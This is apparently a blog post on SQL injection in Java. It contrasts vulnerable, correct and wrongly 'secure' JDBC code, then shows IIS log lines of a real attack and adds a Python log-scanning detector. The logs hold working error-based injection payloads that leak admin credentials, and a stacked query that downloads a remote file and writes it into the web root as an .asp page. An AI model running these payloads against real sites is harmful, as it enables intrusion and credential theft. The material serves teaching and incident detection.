Vulnerable coding: Statement

Statement stmt = conn.createStatement();
// userid and password are concatenated straight into the SQL text, so a value containing a quote (') changes the query itself
ResultSet rs = stmt.executeQuery("select count(*) as cnt from member where userid='" + userid + "' and password='" + password + "'");


Secure coding: PreparedStatement

// ? placeholders: the driver binds userid and password as values, never as SQL text
PreparedStatement stmt = conn.prepareStatement("select count(*) from member where userid=? and password=?");
stmt.setString(1, userid);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();

Incorrect "secure" coding: PreparedStatement

// Looks like a PreparedStatement, but there are no ? placeholders: the values are already concatenated into the SQL text, so nothing is bound and this is as vulnerable as the Statement version
PreparedStatement stmt = conn.prepareStatement("select count(*) from member where userid='" + userid + "' and password='" + password + "'");


With a PreparedStatement, each parameter is wrapped in quotes ('') at the moment it is bound in memory, so it is treated as a value and is never executed as SQL. If the query is built with + as above, there is no question mark (?) placeholder, nothing is bound, and the value is not wrapped.

An SQL injection attack is hard to pull off in a single request: the attacker has to infer table and column names from the error messages that come back. So when an incident involving this vulnerability occurs, searching the web server logs for HTTP error code 500 is a good place to start.


2013-05-31 07:09:28 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%203%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'superadmin^superadmin^최상위_관리자'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 115
2013-05-31 07:09:29 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%204%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'test^123456^_'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 117
2013-05-31 07:09:29 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20isnull(cast([adminid]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([passwd]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]%20as%20nvarchar(4000)),char(32))%20from%20targetdomain_web..lpc_admin%20where%201=1%20and%20adminid%20not%20in%20(select%20top%205%20adminid%20from%20targetdomain_web..lpc_admin%20where%201=1%20group%20by%20adminid))%3E0%20and%201%3C2|108|80040e07|nvarchar_값_'wonny0125^wonny0125^임원근'을(를)_데이터_형식_int(으)로_변환하지_못했습니다. 80 - 114.207.246.162 500 0 0 113
2013-05-31 07:06:15 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20;declare%20@b%20varbinary(8000),@hr%20int,@http%20int,@down%20int%20exec%20sp_oacreate%20[microsoft.xmlhttp],@http%20output%20exec%20@hr%20=%20sp_oamethod%20@http,[open],null,[get],[http://sms.garosu.com/i/i/db.txt],0%20exec%20@hr%20=%20sp_oamethod%20@http,[send],null%20exec%20@hr=sp_oagetproperty%20@http,[responsebody],@b%20output%20exec%20@hr=sp_oacreate%20[adodb.stream],@down%20output%20exec%20@hr=sp_oasetproperty%20@down,[type],1%20exec%20@hr=sp_oasetproperty%20@down,[mode],3%20exec%20@hr=sp_oamethod%20@down,[open],null%20exec%20@hr=sp_oamethod%20@down,[write],null,@b%20exec%20@hr=sp_oamethod%20@down,[savetofile],null,[d:%5Cweb%5Cweb_targetdomain2011%5Cdp.asp],1%20;-- 80 - 114.207.246.162 200 0 0 344
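As an added example (not part of the original post), a small Python check that applies the tip above to IIS W3C log lines: it decodes the query string, flags 500 responses that carry SQL keywords or the 80040e07 conversion error, and also flags SQL keywords on a 200, because the last log line above shows that the stage which actually succeeds does not produce a 500. The log lines inside the block are constructed samples in the same field layout, not the page's own records.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines in the same field layout as the page's records
# (date time s-ip method uri-stem uri-query port user c-ip status substatus win32 time-taken);
# payloads and client addresses are shortened, made-up samples, not the page's data.
SAMPLE_LOG = """\
2013-05-31 07:05:10 211.x.x.x GET /brand/notice/notice_view.asp seq=21 80 - 10.0.0.5 200 0 0 31
2013-05-31 07:09:28 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20and%20(select%20top%201%20cast([adminid]%20as%20nvarchar(4000))%20from%20lpc_admin)%3E0|108|80040e07|conversion_failed 80 - 10.0.0.7 500 0 0 115
2013-05-31 07:10:02 211.x.x.x GET /brand/notice/notice_view.asp seq=abc 80 - 10.0.0.9 500 0 0 12
2013-05-31 07:11:40 211.x.x.x GET /brand/notice/notice_view.asp seq=21%20;declare%20@b%20varbinary(8000)%20exec%20sp_oacreate%20[microsoft.xmlhttp],@b%20output;-- 80 - 10.0.0.7 200 0 0 344
"""

# SQL keywords that have no business in a numeric "seq" parameter.
SQL_TOKENS = re.compile(
    r"\b(select|union|cast|convert|declare|exec|sp_oa\w+|xp_\w+|waitfor)\b", re.IGNORECASE)
# OLE DB conversion error that IIS appended to the query field in the page's log lines.
OLEDB_ERR = "80040e07"

def parse_line(line):
    """Split one W3C line into the fields the check needs; None if it is malformed."""
    parts = line.split()
    if len(parts) < 13:
        return None
    return {"time": parts[0] + " " + parts[1], "uri": parts[4],
            "query": unquote_plus(parts[5]),  # decode %20, %3E, ... before matching
            "client": parts[8], "status": int(parts[9])}

def classify(rec):
    """500 plus SQL text or the OLE DB error is the page's signal; SQL text on a 200 still counts."""
    has_sql = bool(SQL_TOKENS.search(rec["query"]))
    if rec["status"] == 500 and (has_sql or OLEDB_ERR in rec["query"]):
        return "error-based-sqli"
    if has_sql:
        return "sqli-pattern"
    if rec["status"] == 500:
        return "server-error"   # plain 500: worth a look, but no injection text in the query
    return None

def scan(log_text):
    """Return (time, client, status, label) for every line that needs attention."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        label = classify(rec) if rec else None
        if label:
            hits.append((rec["time"], rec["client"], rec["status"], label))
    return hits
```

Running `scan` over a real IIS log and grouping the hits by client address gives the timeline the text describes: a burst of error-based probes ending in a 200 from the same address.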

iesay